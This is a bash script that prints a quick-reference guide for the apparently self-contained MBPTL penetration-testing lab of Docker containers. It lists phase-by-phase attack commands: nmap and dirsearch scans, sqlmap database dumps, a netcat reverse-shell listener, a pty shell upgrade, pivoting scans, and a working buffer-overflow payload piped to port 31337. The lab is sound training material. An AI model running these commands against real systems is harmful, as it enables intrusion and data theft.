#!/bin/bash

# MBPTL Quick Reference Script
# This script provides quick access to common commands and tool locations

echo "================================================"
echo "  MBPTL - Quick Reference Guide"
echo "================================================"
echo ""
echo "RECONNAISSANCE PHASE"
echo "--------------------"
echo "Port Scanning:"
echo "  nmap mbptl-main"
echo "  nmap -p- mbptl-main"
echo ""
echo "Information Gathering:"
echo "  curl -I http://mbptl-main/"
echo "  curl -I http://mbptl-main:8080/"
echo ""
echo "Directory Scanning:"
echo "  dirsearch -u http://mbptl-main/"
echo "  dirsearch -u http://mbptl-main:8080/"
echo ""
echo ""
echo "EXPLOITATION PHASE"
echo "------------------"
echo "SQL Injection:"
echo "  sqlmap -u 'http://mbptl-main/detail.php?id=1' --dbs"
echo "  sqlmap -u 'http://mbptl-main/detail.php?id=1' -D administrator --dump"
echo ""
echo ""
echo "POST-EXPLOITATION PHASE"
echo "-----------------------"
echo "Reverse Shell Listener:"
echo "  nc -lp 1337"
echo ""
echo "Download LinPEAS:"
echo "  ~/tools/get-linpeas.sh"
echo ""
echo "Spawn Interactive Shell (on target):"
echo "  python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
echo ""
echo ""
echo "PIVOTING PHASE"
echo "--------------"
echo "Network Discovery:"
echo "  ip addr show"
echo "  nmap -sn 172.17.0.0/16"
echo ""
echo "Internal Host Scanning:"
echo "  nmap -p- mbptl-app"
echo "  nmap -p- mbptl-internal"
echo ""
echo "Access Internal Services:"
echo "  curl http://mbptl-app:5000/"
echo "  nc mbptl-internal 31337"
echo ""
echo ""
echo "BINARY EXPLOITATION PHASE"
echo "-------------------------"
echo "Analyze Binary:"
echo "  file mbptl-internal_binary"
echo "  strings mbptl-internal_binary | grep -i secret"
echo "  objdump -d mbptl-internal_binary | grep secret"
echo ""
echo "Buffer Overflow Exploit:"
echo "  (python3 -c 'import struct, sys; sys.stdout.buffer.write(b\"A\"*136 + struct.pack(\"<Q\", 0x401282) + struct.pack(\"<Q\", 0x4011b6))'; cat -) | nc mbptl-internal 31337"
echo ""
echo ""
echo "TARGET CONTAINERS"
echo "-----------------"
echo "  mbptl-main     - Ports: 80 (HTTP), 8080 (Admin), 3306 (MySQL)"
echo "  mbptl-internal - Port: 31337 (Binary Service)"
echo "  mbptl-app      - Port: 5000 (Flask App)"
echo ""
echo ""
echo "USEFUL DIRECTORIES"
echo "------------------"
echo "  ~/tools/       - All penetration testing tools"
echo "  ~/workspace/   - Your working directory"
echo "  ~/scripts/     - Custom scripts"
echo ""
echo "================================================"
echo ""
